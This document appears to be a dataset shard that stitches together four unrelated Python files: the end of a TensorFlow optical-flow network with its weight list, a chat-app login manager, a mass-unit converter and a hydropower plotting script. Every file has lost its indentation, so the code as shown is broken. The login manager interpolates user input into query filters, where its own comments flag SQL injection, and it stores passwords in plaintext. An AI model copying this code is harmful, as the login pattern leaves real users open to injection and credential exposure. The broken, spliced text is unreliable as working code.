blobs['blob161'] = tf.nn.conv2d(blobs['blob160'], self.weights['fuse_conv2_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv2_1_b']
blobs['blob161'] = self.leaky_relu(blobs['blob161'], 0.1)
blobs['blob162'] = tf.nn.conv2d(blobs['blob161'], self.weights['fuse__Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution5_b']
blobs['blob163'] = tf.nn.conv2d_transpose(blobs['blob161'], self.weights['fuse_deconv1_w'], output_shape=[batch_size, ADAPTED_HEIGHT/2, ADAPTED_WIDTH/2, 32], strides=[1,2,2,1]) + self.weights['fuse_deconv1_b']
blobs['blob163'] = self.leaky_relu(blobs['blob163'], 0.1)
blobs['blob164'] = tf.nn.conv2d_transpose(blobs['blob162'], self.weights['fuse_upsample_flow2to1_w'], output_shape=[batch_size, ADAPTED_HEIGHT/2, ADAPTED_WIDTH/2, 2], strides=[1,2,2,1]) + self.weights['fuse_upsample_flow2to1_b']
blobs['blob165'] = tf.concat([blobs['blob159'], blobs['blob163'], blobs['blob164']], axis=3)
blobs['blob166'] = tf.nn.conv2d(blobs['blob165'], self.weights['fuse_interconv1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_interconv1_b']
blobs['blob167'] = tf.nn.conv2d(blobs['blob166'], self.weights['fuse__Convolution6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution6_b']
blobs['blob168'] = tf.nn.conv2d_transpose(blobs['blob165'], self.weights['fuse_deconv0_w'], output_shape=[batch_size, ADAPTED_HEIGHT/1, ADAPTED_WIDTH/1, 16], strides=[1,2,2,1]) + self.weights['fuse_deconv0_b']
blobs['blob168'] = self.leaky_relu(blobs['blob168'], 0.1)
blobs['blob169'] = tf.nn.conv2d_transpose(blobs['blob167'], self.weights['fuse_upsample_flow1to0_w'], output_shape=[batch_size, ADAPTED_HEIGHT, ADAPTED_WIDTH, 2], strides=[1,2,2,1]) + self.weights['fuse_upsample_flow1to0_b']
blobs['blob170'] = tf.concat([blobs['blob157'], blobs['blob168'], blobs['blob169']], axis=3)
blobs['blob171'] = tf.nn.conv2d(blobs['blob170'], self.weights['fuse_interconv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_interconv0_b']
blobs['blob172'] = tf.nn.conv2d(blobs['blob171'], self.weights['fuse__Convolution7_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution7_b']
blobs['predict_flow_resize'] = tf.image.resize_bilinear(blobs['blob172'], size=[TARGET_HEIGHT, TARGET_WIDTH], align_corners=True)
scale = tf.stack([SCALE_WIDTH, SCALE_HEIGHT])
scale = tf.reshape(scale, [1,1,1,2])
blobs['predict_flow_final'] = scale*blobs['predict_flow_resize']
self.blobs = blobs
return blobs
def all_variables(self):
return [('netsd_deconv5_w', (4, 4, 512, 1024)),
('netsd_conv1_b', (64,)),
('netsd_upsample_flow5to4_w', (4, 4, 2, 2)),
('conv2_b', (128,)),
('fuse__Convolution5_w', (3, 3, 128, 2)),
('netsd_conv4_1_w', (3, 3, 512, 512)),
('netsd_interconv3_w', (3, 3, 386, 128)),
('netsd_deconv4_w', (4, 4, 256, 1026)),
('deconv4_b', (256,)),
('fuse_interconv0_w', (3, 3, 82, 16)),
('netsd_Convolution2_b', (2,)),
('net3_conv4_b', (512,)),
('net3_conv3_b', (256,)),
('net3_predict_conv2_w', (3, 3, 194, 2)),
('net3_predict_conv3_b', (2,)),
('conv6_1_w', (3, 3, 1024, 1024)),
('fuse_upsample_flow2to1_b', (2,)),
('Convolution1_w', (3, 3, 1024, 2)),
('net3_deconv3_w', (4, 4, 128, 770)),
('net2_deconv3_b', (128,)),
('fuse_conv1_w', (3, 3, 64, 64)),
('conv5_w', (3, 3, 512, 512)),
('Convolution4_w', (3, 3, 386, 2)),
('fuse_conv0_b', (64,)),
('net2_conv3_w', (5, 5, 128, 256)),
('upsample_flow4to3_b', (2,)),
('netsd_conv4_1_b', (512,)),
('fuse_upsample_flow2to1_w', (4, 4, 2, 2)),
('netsd_conv4_b', (512,)),
('net2_net2_upsample_flow3to2_b', (2,)),
('net3_predict_conv4_b', (2,)),
('fuse_upsample_flow1to0_b', (2,)),
('conv4_1_w', (3, 3, 512, 512)),
('deconv2_b', (64,)),
('net2_conv4_1_w', (3, 3, 512, 512)),
('net3_deconv4_w', (4, 4, 256, 1026)),
('net2_deconv5_b', (512,)),
('netsd_deconv5_b', (512,)),
('net2_deconv2_b', (64,)),
('net3_conv2_b', (128,)),
('conv_redir_w', (1, 1, 256, 32)),
('fuse_conv1_1_b', (128,)),
('net2_deconv5_w', (4, 4, 512, 1024)),
('net2_conv5_b', (512,)),
('net2_conv4_w', (3, 3, 256, 512)),
('net2_predict_conv6_w', (3, 3, 1024, 2)),
('netsd_conv5_b', (512,)),
('deconv4_w', (4, 4, 256, 1026)),
('net2_net2_upsample_flow4to3_b', (2,)),
('fuse__Convolution6_w', (3, 3, 32, 2)),
('net3_deconv2_w', (4, 4, 64, 386)),
('net2_conv6_1_w', (3, 3, 1024, 1024)),
('netsd_conv0_b', (64,)),
('netsd_conv5_1_w', (3, 3, 512, 512)),
('net2_conv6_1_b', (1024,)),
('net3_conv2_w', (5, 5, 64, 128)),
('net3_predict_conv6_w', (3, 3, 1024, 2)),
('net3_conv4_1_b', (512,)),
('net3_net3_upsample_flow4to3_w', (4, 4, 2, 2)),
('net2_deconv2_w', (4, 4, 64, 386)),
('deconv3_b', (128,)),
('netsd_interconv5_b', (512,)),
('net2_conv3_1_w', (3, 3, 256, 256)),
('netsd_interconv4_w', (3, 3, 770, 256)),
('net3_deconv3_b', (128,)),
('fuse_conv0_w', (3, 3, 11, 64)),
('net3_predict_conv6_b', (2,)),
('fuse_upsample_flow1to0_w', (4, 4, 2, 2)),
('netsd_deconv3_b', (128,)),
('net3_predict_conv5_w', (3, 3, 1026, 2)),
('netsd_conv5_w', (3, 3, 512, 512)),
('netsd_interconv5_w', (3, 3, 1026, 512)),
('netsd_Convolution3_w', (3, 3, 256, 2)),
('net2_predict_conv4_w', (3, 3, 770, 2)),
('deconv2_w', (4, 4, 64, 386)),
('net3_predict_conv5_b', (2,)),
('fuse__Convolution5_b', (2,)),
('fuse__Convolution7_w', (3, 3, 16, 2)),
('net2_net2_upsample_flow6to5_w', (4, 4, 2, 2)),
('netsd_conv3_b', (256,)),
('net3_conv6_w', (3, 3, 512, 1024)),
('net3_conv1_b', (64,)),
('netsd_Convolution4_b', (2,)),
('net3_conv3_w', (5, 5, 128, 256)),
('netsd_conv0_w', (3, 3, 6, 64)),
('net2_conv4_b', (512,)),
('net2_predict_conv3_w', (3, 3, 386, 2)),
('net3_net3_upsample_flow3to2_w', (4, 4, 2, 2)),
('fuse_conv1_1_w', (3, 3, 64, 128)),
('deconv5_b', (512,)),
('fuse__Convolution7_b', (2,)),
('net3_conv6_1_w', (3, 3, 1024, 1024)),
('net3_net3_upsample_flow5to4_w', (4, 4, 2, 2)),
('net3_conv4_w', (3, 3, 256, 512)),
('upsample_flow5to4_w', (4, 4, 2, 2)),
('conv4_1_b', (512,)),
('img0s_aug_b', (320, 448, 3, 1)),
('conv5_1_b', (512,)),
('net3_conv4_1_w', (3, 3, 512, 512)),
('upsample_flow5to4_b', (2,)),
('net3_conv3_1_b', (256,)),
('Convolution1_b', (2,)),
('upsample_flow4to3_w', (4, 4, 2, 2)),
('conv5_1_w', (3, 3, 512, 512)),
('conv3_1_b', (256,)),
('conv3_w', (5, 5, 128, 256)),
('net2_conv2_b', (128,)),
('net3_net3_upsample_flow6to5_w', (4, 4, 2, 2)),
('upsample_flow3to2_b', (2,)),
('netsd_Convolution5_w', (3, 3, 64, 2)),
('netsd_interconv2_w', (3, 3, 194, 64)),
('net2_predict_conv6_b', (2,)),
('net2_deconv4_w', (4, 4, 256, 1026)),
('scale_conv1_b', (2,)),
('net2_net2_upsample_flow5to4_w', (4, 4, 2, 2)),
('netsd_conv2_b', (128,)),
('netsd_conv2_1_b', (128,)),
('netsd_upsample_flow6to5_w', (4, 4, 2, 2)),
('net2_predict_conv5_b', (2,)),
('net3_conv6_1_b', (1024,)),
('netsd_conv6_w', (3, 3, 512, 1024)),
('Convolution4_b', (2,)),
('net2_predict_conv4_b', (2,)),
('fuse_deconv1_b', (32,)),
('conv3_1_w', (3, 3, 473, 256)),
('net3_deconv2_b', (64,)),
('netsd_conv6_b', (1024,)),
('net2_conv5_1_w', (3, 3, 512, 512)),
('net3_conv5_1_w', (3, 3, 512, 512)),
('deconv5_w', (4, 4, 512, 1024)),
('fuse_conv2_b', (128,)),
('netsd_conv1_1_b', (128,)),
('netsd_upsample_flow6to5_b', (2,)),
('Convolution5_w', (3, 3, 194, 2)),
('scale_conv1_w', (1, 1, 2, 2)),
('net2_net2_upsample_flow5to4_b', (2,)),
('conv6_1_b', (1024,)),
('fuse_conv2_1_b', (128,)),
('netsd_Convolution5_b', (2,)),
('netsd_conv3_1_b', (256,)),
('conv2_w', (5, 5, 64, 128)),
('fuse_conv2_w', (3, 3, 128, 128)),
('net2_conv2_w', (5, 5, 64, 128)),
('conv3_b', (256,)),
('net3_deconv5_w', (4, 4, 512, 1024)),
('img1s_aug_w', (1, 1, 1, 1)),
('netsd_conv2_w', (3, 3, 128, 128)),
('conv6_w', (3, 3, 512, 1024)),
('netsd_conv4_w', (3, 3, 256, 512)),
('net2_conv1_w', (7, 7, 12, 64)),
('netsd_Convolution1_w', (3, 3, 1024, 2)),
('netsd_conv1_w', (3, 3, 64, 64)),
('netsd_deconv4_b', (256,)),
('conv4_w', (3, 3, 256, 512)),
('conv5_b', (512,)),
('net3_deconv5_b', (512,)),
('netsd_interconv3_b', (128,)),
('net3_conv3_1_w', (3, 3, 256, 256)),
('net2_predict_conv5_w', (3, 3, 1026, 2)),
('Convolution3_b', (2,)),
('netsd_conv5_1_b', (512,)),
('netsd_interconv4_b', (256,)),
('conv4_b', (512,)),
('net3_net3_upsample_flow6to5_b', (2,)),
('Convolution5_b', (2,)),
('fuse_conv2_1_w', (3, 3, 128, 128)),
('net3_net3_upsample_flow4to3_b', (2,)),
('conv1_w', (7, 7, 3, 64)),
('upsample_flow6to5_b', (2,)),
('conv6_b', (1024,)),
('netsd_upsample_flow3to2_w', (4, 4, 2, 2)),
('net2_deconv3_w', (4, 4, 128, 770)),
('netsd_conv2_1_w', (3, 3, 128, 128)),
('netsd_Convolution3_b', (2,)),
('netsd_upsample_flow4to3_w', (4, 4, 2, 2)),
('fuse_interconv1_w', (3, 3, 162, 32)),
('netsd_upsample_flow4to3_b', (2,)),
('netsd_conv3_1_w', (3, 3, 256, 256)),
('netsd_deconv3_w', (4, 4, 128, 770)),
('net3_conv5_b', (512,)),
('net3_conv5_1_b', (512,)),
('net2_net2_upsample_flow4to3_w', (4, 4, 2, 2)),
('net2_net2_upsample_flow3to2_w', (4, 4, 2, 2)),
('net2_conv3_b', (256,)),
('netsd_conv6_1_w', (3, 3, 1024, 1024)),
('fuse_deconv0_b', (16,)),
('net2_predict_conv2_w', (3, 3, 194, 2)),
('net2_conv1_b', (64,)),
('net2_conv6_b', (1024,)),
('net3_predict_conv2_b', (2,)),
('net2_conv4_1_b', (512,)),
('netsd_Convolution4_w', (3, 3, 128, 2)),
('deconv3_w', (4, 4, 128, 770)),
('fuse_deconv1_w', (4, 4, 32, 128)),
('netsd_Convolution2_w', (3, 3, 512, 2)),
('netsd_Convolution1_b', (2,)),
('net2_conv3_1_b', (256,)),
('fuse_conv1_b', (64,)),
('net2_deconv4_b', (256,)),
('net3_predict_conv4_w', (3, 3, 770, 2)),
('Convolution3_w', (3, 3, 770, 2)),
('netsd_upsample_flow3to2_b', (2,)),
('net3_net3_upsample_flow3to2_b', (2,)),
('fuse_interconv0_b', (16,)),
('Convolution2_w', (3, 3, 1026, 2)),
('net2_conv6_w', (3, 3, 512, 1024)),
('netsd_conv3_w', (3, 3, 128, 256)),
('netsd_upsample_flow5to4_b', (2,)),
('net3_predict_conv3_w', (3, 3, 386, 2)),
('conv_redir_b', (32,)),
('net2_conv5_1_b', (512,)),
('upsample_flow6to5_w', (4, 4, 2, 2)),
('net2_net2_upsample_flow6to5_b', (2,)),
('net3_conv6_b', (1024,)),
('fuse__Convolution6_b', (2,)),
('Convolution2_b', (2,)),
('upsample_flow3to2_w', (4, 4, 2, 2)),
('net3_conv1_w', (7, 7, 12, 64)),
('fuse_deconv0_w', (4, 4, 16, 162)),
('img0s_aug_w', (1, 1, 1, 1)),
('netsd_conv1_1_w', (3, 3, 64, 128)),
('netsd_deconv2_b', (64,)),
('net2_conv5_w', (3, 3, 512, 512)),
('fuse_interconv1_b', (32,)),
('netsd_conv6_1_b', (1024,)),
('netsd_interconv2_b', (64,)),
('img1s_aug_b', (320, 448, 3, 1)),
('netsd_deconv2_w', (4, 4, 64, 386)),
('net2_predict_conv3_b', (2,)),
('net2_predict_conv2_b', (2,)),
('net3_deconv4_b', (256,)),
('net3_net3_upsample_flow5to4_b', (2,)),
('conv1_b', (64,)),
('net3_conv5_w', (3, 3, 512, 512))]
|
StarcoderdataPython
|
4819309
|
import sys
sys.path.append(".")
from Model.jsn_drop_service import jsnDrop
from time import gmtime
class UserManager(object):
current_user = None
current_pass = None
current_status = None
current_screen = None
stop_thread = False
chat_list = None
this_user_manager = None
def now_time_stamp(self):
time_now = gmtime()
timestamp_str = f"{time_now.tm_year}-{time_now.tm_mon}-{time_now.tm_mday} {time_now.tm_hour}:{time_now.tm_min}:{time_now.tm_sec}"
return timestamp_str
def __init__(self) -> None:
super().__init__()
self.jsnDrop = jsnDrop("dd6fb593-50ea-4463-bf56-e92e240a45cc","https://newsimland.com/~todd/JSON")
# SCHEMA Make sure the tables are CREATED - jsnDrop does not wipe an existing table if it is recreated
result = self.jsnDrop.create("tblUser",{"PersonID PK":"A_LOOONG_NAME"+('X'*50),
"Password":"<PASSWORD>"+('X'*50),
"Status":"STATUS_STRING",
"DesNo": 10})
result = self.jsnDrop.create("tblChat",{"Time PK": self.now_time_stamp()+('X'*50),
"PersonID":"A_LOOONG_NAME"+('X'*50),
"DesNo":10,
"Chat":"A_LOONG____CHAT_ENTRY"+('X'*255)})
UserManager.this_user_manager = self
def register(self, user_id, password):
api_result = self.jsnDrop.select("tblUser",f"PersonID = '{user_id}'") # Danger SQL injection attack via user_id?? Is JsnDrop SQL injection attack safe??
if( "DATA_ERROR" in self.jsnDrop.jsnStatus): # we get a DATA ERROR on an empty list - this is a design error in jsnDrop
# Is this where our password should be SHA'ed !?
result = self.jsnDrop.store("tblUser",[{'PersonID':user_id,'Password':password,'Status':'Registered', "DesNo": 0}])
UserManager.currentUser = user_id
UserManager.current_status = 'Logged Out'
result = "Registration Success"
else:
result = "User Already Exists"
return result
def login(self, user_id, password):
result = None
api_result = self.jsnDrop.select("tblUser",f"PersonID = '{user_id}' AND Password = '{password}'") # Danger SQL injection attack via user_id?? Is JsnDrop SQL injection attack safe??
api_result1 = self.jsnDrop.select("tblUser",f"PersonID = '{user_id}' AND Status = 'Logged In'")
if not("Data error" in api_result1): # check if user is logged in or not. if no data error means user is logged in
result = "User has already logged in"
UserManager.current_status = "Logged Out"
UserManager.current_user = None
elif("Data error" in api_result): # then the (user_id,password) pair do not exist - so bad login
result = "Wrong username or password"
UserManager.current_status = "Logged Out"
UserManager.current_user = None
else:
UserManager.current_status = "Logged In"
UserManager.current_user = user_id
UserManager.current_pass = password
api_result = self.jsnDrop.store("tblUser",[{"PersonID":user_id,"Password":password,"Status":"Logged In", "DesNo": 0}])
result = "Login Success"
return result
def get_online_user(self):
api_result = self.jsnDrop.select("tblUser", "Status = 'Logged In'")
online_user = []
for value in api_result:
online_user.append(value['PersonID'])
return online_user
def get_des_user(self, DesNo):
api_result = self.jsnDrop.select("tblUser", f"Status = 'Logged In' AND DesNo = {DesNo}")
des_user = []
for value in api_result:
des_user.append(value['PersonID'])
return des_user
def set_current_DES(self, DesNo):
result = None
if UserManager.current_status == "Logged In":
user_id = UserManager.current_user
password = UserManager.current_pass
api_result = self.jsnDrop.store("tblUser",[{"PersonID":user_id,"Password":password,"Status":"Logged In", "DesNo": DesNo}])
UserManager.current_screen = DesNo
result = "Set Screen"
else:
result = "Log in to set the current screen"
return result
def logout(self):
result = "Must be 'Logged In' to 'LogOut' "
if UserManager.current_status == "Logged In":
api_result = self.jsnDrop.store("tblUser",[{"PersonID": UserManager.current_user,
"Password": <PASSWORD>,
"Status":"Logged Out",
"DesNo": 0}])
if not("ERROR" in api_result):
UserManager.current_status = "Logged Out"
result = "Logged Out"
else:
result = self.jsnDrop.jsnStatus
return result
def send_chat(self, message):
result = None
if UserManager.current_status != "Logged In":
result = "Please log in to chat"
elif UserManager.current_screen == None:
result = "Chat not sent. Not in DES"
else:
user_id = UserManager.current_user
des_screen = UserManager.current_screen
api_result = self.jsnDrop.store("tblChat",[{"Time": self.now_time_stamp(),
"PersonID": user_id,
"DesNo": f'{des_screen}',
"Chat": message}])
if "STORE tblChat executed" in api_result:
result = "Chat sent"
else:
result = self.jsnDrop.jsnStatus
return result
def get_chat(self, DesNo):
api_result = self.jsnDrop.select("tblChat", f"DesNo = {DesNo}")
chat_lists = []
messages = ""
if not 'Data error' in api_result:
sorted_chats = sorted(api_result, key=lambda i: i['Time'])
if len(sorted_chats) >= 5:
chat_lists = sorted_chats[-5:]
for value in chat_lists:
msg_string = f"[{value['PersonID']}]:{value['Chat']} \t(sent at {value['Time']})\n"
messages += msg_string
else:
for value in sorted_chats:
msg_string = f"[{value['PersonID']}]:{value['Chat']} \t(sent at {value['Time']})\n"
messages += msg_string
else:
messages = ""
return messages
|
StarcoderdataPython
|
3335110
|
<filename>utils.py<gh_stars>1-10
import json
from settings import MASS_UNITS
def convert_mass(mass, from_unit, to_unit):
if from_unit == to_unit:
return mass
# from kg to ...
if from_unit == MASS_UNITS[0]:
if to_unit == MASS_UNITS[1]:
return mass * 1.e3
elif to_unit == MASS_UNITS[2]:
return mass * 1.e6
elif to_unit == MASS_UNITS[3]:
return mass * 1.e9
elif to_unit == MASS_UNITS[4]:
return mass * 1.e12
# from g to ...
if from_unit == MASS_UNITS[1]:
if to_unit == MASS_UNITS[0]:
return mass * 1.e-3
elif to_unit == MASS_UNITS[2]:
return mass * 1.e3
elif to_unit == MASS_UNITS[3]:
return mass * 1.e6
elif to_unit == MASS_UNITS[4]:
return mass * 1.e9
# from mg to ...
if from_unit == MASS_UNITS[2]:
if to_unit == MASS_UNITS[0]:
return mass * 1.e-6
elif to_unit == MASS_UNITS[1]:
return mass * 1.e-3
elif to_unit == MASS_UNITS[3]:
return mass * 1.e3
elif to_unit == MASS_UNITS[4]:
return mass * 1.e6
# from ug to ...
if from_unit == MASS_UNITS[3]:
if to_unit == MASS_UNITS[0]:
return mass * 1.e-9
elif to_unit == MASS_UNITS[1]:
return mass * 1.e-6
elif to_unit == MASS_UNITS[2]:
return mass * 1.e-3
elif to_unit == MASS_UNITS[4]:
return mass * 1.e3
# from ng to ...
if from_unit == MASS_UNITS[4]:
if to_unit == MASS_UNITS[0]:
return mass * 1.e-12
elif to_unit == MASS_UNITS[1]:
return mass * 1.e-9
elif to_unit == MASS_UNITS[2]:
return mass * 1.e-6
elif to_unit == MASS_UNITS[3]:
return mass * 1.e-3
|
StarcoderdataPython
|
4807766
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 21 16:43:56 2020
@author: ssterl
"""
##########################################
######### REVUB plotting results #########
##########################################
# REVUB model © 2019 CIREG project
# Author: <NAME>, <NAME>
# This code accompanies the paper "Turbines of the Caribbean: Decarbonising Suriname's electricity mix through hydro-supported integration of wind power" by Sterl et al.
# All equation, section &c. numbers refer to the official REVUB manual (see corresponding GitHub page, https://github.com/VUB-HYDR/REVUB).
import numpy as np
import pandas as pd
import numbers as nb
import matplotlib.pyplot as plt
import numpy.matlib
# [set by user] select hydropower plant (starting count at zero) and year (starting count at zero) for which to display results
plot_HPP_multiple = np.array([0])
plot_year_multiple = 0
# [set by user] select month of year (1 = Jan, 2 = Feb, &c.) and day of month, and number of days to display results
plot_month_multiple = 1
plot_day_month_multiple = 14
plot_num_days_multiple = 3
# [set by user] total electricity demand to be met (MW)
P_total_av = 146.84 # MW
E_total_av = (1e-3)*P_total_av*hrs_day*365 # GWh/year
P_total_hourly = P_total_av*L_norm[:,:,0] # MW
# [calculate] non-hydro-solar-wind (thermal) power contribution (difference between total and hydro-solar-wind)
P_BAL_thermal_hourly = P_total_hourly - np.nansum(P_BAL_hydro_stable_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_flexible_hourly[:,:,plot_HPP_multiple] + P_BAL_wind_hourly[:,:,plot_HPP_multiple] + P_BAL_solar_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_RoR_hourly[:,:,plot_HPP_multiple], axis = 2)
P_STOR_thermal_hourly = P_total_hourly - np.nansum(P_STOR_hydro_stable_hourly[:,:,plot_HPP_multiple] + P_STOR_hydro_flexible_hourly[:,:,plot_HPP_multiple] + P_STOR_wind_hourly[:,:,plot_HPP_multiple] + P_STOR_solar_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_RoR_hourly[:,:,plot_HPP_multiple] - P_STOR_pump_hourly[:,:,plot_HPP_multiple], axis = 2)
P_BAL_thermal_hourly[P_BAL_thermal_hourly < 0] = 0
P_STOR_thermal_hourly[P_STOR_thermal_hourly < 0] = 0
# [calculate] excess (to-be-curtailed) power
P_BAL_curtailed_hourly = np.nansum(P_BAL_hydro_stable_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_flexible_hourly[:,:,plot_HPP_multiple] + P_BAL_wind_hourly[:,:,plot_HPP_multiple] + P_BAL_solar_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_RoR_hourly[:,:,plot_HPP_multiple], axis = 2) + P_BAL_thermal_hourly - P_total_hourly
P_STOR_curtailed_hourly = np.nansum(P_STOR_hydro_stable_hourly[:,:,plot_HPP_multiple] + P_STOR_hydro_flexible_hourly[:,:,plot_HPP_multiple] + P_STOR_wind_hourly[:,:,plot_HPP_multiple] + P_STOR_solar_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_RoR_hourly[:,:,plot_HPP_multiple] - P_STOR_pump_hourly[:,:,plot_HPP_multiple], axis = 2) + P_STOR_thermal_hourly - P_total_hourly
# [preallocate] extra variables for thermal power generation assessment
E_total_bymonth = np.zeros(shape = (months_yr,len(simulation_years)))
E_thermal_BAL_bymonth = np.zeros(shape = (months_yr,len(simulation_years)))
E_thermal_STOR_bymonth = np.zeros(shape = (months_yr,len(simulation_years)))
E_curtailed_BAL_bymonth = np.zeros(shape = (months_yr,len(simulation_years)))
E_curtailed_STOR_bymonth = np.zeros(shape = (months_yr,len(simulation_years)))
# [loop] across all years in the simulation
for y in range(len(simulation_years)):
# [loop] across all months of the year, converting hourly values (MW or MWh/h) to GWh/month (see eq. S24, S25)
for m in range(months_yr):
E_total_bymonth[m,y] = 10**(-3)*np.sum(P_total_hourly[int(positions[m,y]):int(positions[m+1,y]),y])
E_thermal_BAL_bymonth[m,y] = 10**(-3)*np.sum(P_BAL_thermal_hourly[int(positions[m,y]):int(positions[m+1,y]),y])
E_thermal_STOR_bymonth[m,y] = 10**(-3)*np.sum(P_STOR_thermal_hourly[int(positions[m,y]):int(positions[m+1,y]),y])
E_curtailed_BAL_bymonth[m,y] = 10**(-3)*np.sum(P_BAL_curtailed_hourly[int(positions[m,y]):int(positions[m+1,y]),y])
E_curtailed_STOR_bymonth[m,y] = 10**(-3)*np.sum(P_STOR_curtailed_hourly[int(positions[m,y]):int(positions[m+1,y]),y])
# [read] vector with hours in each year
hrs_year = range(int(hrs_byyear[plot_year_multiple]))
# [identify] index of day of month to plot
plot_day_load = np.sum(days_year[range(plot_month_multiple - 1),plot_year_multiple]) + plot_day_month_multiple - 1
# [strings] string arrays containing the names and abbreviations of the different months
months_names_full = np.array(["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"])
months_names_short = np.array(["J", "F", "M", "A", "M", "J", "J", "A", "S", "O", "N", "D"])
months_byyear = np.empty(shape = (months_yr,len(simulation_years)), dtype = 'object')
# [arrange] create string for each month-year combination in the time series
for y in range(len(simulation_years)):
for m in range(months_yr):
months_byyear[m,y] = months_names_full[m] + np.str(simulation_years[y])
# [arrange] create string for each day-month-year combination in the time series
days_bymonth_byyear = np.empty(shape = (int(np.max(days_year)), months_yr,len(simulation_years)), dtype = 'object')
for y in range(len(simulation_years)):
for m in range(months_yr):
for d in range(int(days_year[m,y])):
days_bymonth_byyear[d,m,y] = np.str(d+1) + months_names_full[m] + 'Yr' + np.str(y+1)
days_bymonth_byyear_axis = (np.transpose(days_bymonth_byyear[:,:,plot_year_multiple])).ravel()
days_bymonth_byyear_axis = list(filter(None, days_bymonth_byyear_axis))
# [colours] for plotting
colour_hydro_stable = np.array([55, 126, 184]) / 255
colour_hydro_flexible = np.array([106, 226, 207]) / 255
colour_solar = np.array([255, 255, 51]) / 255
colour_wind = np.array([77, 175, 74]) / 255
colour_hydro_RoR = np.array([100, 100, 100]) / 255
colour_hydro_pumped = np.array([77, 191, 237]) / 255
colour_thermal = np.array([75, 75, 75]) / 255
colour_curtailed = np.array([200, 200, 200]) / 255
# [figure] (cf. Fig. S4a, S9a)
# [plot] average monthly power mix in user-selected year
fig = plt.figure()
area_mix_BAL_bymonth = [np.nansum(E_hydro_BAL_stable_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_hydro_BAL_flexible_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_wind_BAL_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1) - E_curtailed_BAL_bymonth[:,plot_year_multiple], np.nansum(E_solar_BAL_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_hydro_BAL_RoR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), E_thermal_BAL_bymonth[:,plot_year_multiple], E_curtailed_BAL_bymonth[:,plot_year_multiple]]/days_year[:,plot_year_multiple]*10**3/hrs_day
labels_generation_BAL = ['Hydropower (stable)', 'Hydropower (flexible)', 'Wind power', 'Solar power', 'Hydropower (RoR)', 'Thermal', 'Curtailed VRE']
plt.stackplot(np.array(range(months_yr)), area_mix_BAL_bymonth, labels = labels_generation_BAL, colors = [colour_hydro_stable, colour_hydro_flexible, colour_wind, colour_solar, colour_hydro_RoR, colour_thermal, colour_curtailed])
plt.plot(np.array(range(months_yr)), E_total_bymonth[:,plot_year_multiple]/days_year[:,plot_year_multiple]*10**3/hrs_day, label = 'Total load', color = 'black', linewidth = 3)
plt.plot(np.array(range(months_yr)), np.nansum(ELCC_BAL_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(range(months_yr)), months_names_full, rotation = 'vertical')
plt.ylabel('Power generation (MWh/h)')
plt.title('monthly power generation (selected year #' + str(plot_year_multiple + 1) + ', BAL)')
plt.savefig("Total_Fig1.png", dpi = 300, bbox_inches = 'tight')
# [figure] (cf. Fig. S4b, S9b)
# [plot] power mix by year
fig = plt.figure()
E_generated_BAL_bymonth_sum = [np.nansum(np.sum(E_hydro_BAL_stable_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_hydro_BAL_flexible_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_wind_BAL_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1) - np.sum(E_curtailed_BAL_bymonth, axis = 0), np.nansum(np.sum(E_solar_BAL_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_hydro_BAL_RoR_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.sum(E_thermal_BAL_bymonth, axis = 0), np.sum(E_curtailed_BAL_bymonth, axis = 0)]
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[0], bottom = np.sum(E_generated_BAL_bymonth_sum[0:0], axis = 0), label = 'Hydropower (stable)', color = colour_hydro_stable)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[1], bottom = np.sum(E_generated_BAL_bymonth_sum[0:1], axis = 0), label = 'Hydropower (flexible)', color = colour_hydro_flexible)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[2], bottom = np.sum(E_generated_BAL_bymonth_sum[0:2], axis = 0), label = 'Wind power', color = colour_wind)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[3], bottom = np.sum(E_generated_BAL_bymonth_sum[0:3], axis = 0), label = 'Solar power', color = colour_solar)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[4], bottom = np.sum(E_generated_BAL_bymonth_sum[0:4], axis = 0), label = 'Hydropower (RoR)', color = colour_hydro_RoR)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[5], bottom = np.sum(E_generated_BAL_bymonth_sum[0:5], axis = 0), label = 'Thermal', color = colour_thermal)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[6], bottom = np.sum(E_generated_BAL_bymonth_sum[0:6], axis = 0), label = 'Curtailed VRE', color = colour_curtailed)
plt.plot(np.array(range(len(simulation_years))), np.sum(E_total_bymonth, axis = 0), label = 'Total load', color = 'black', linewidth = 3)
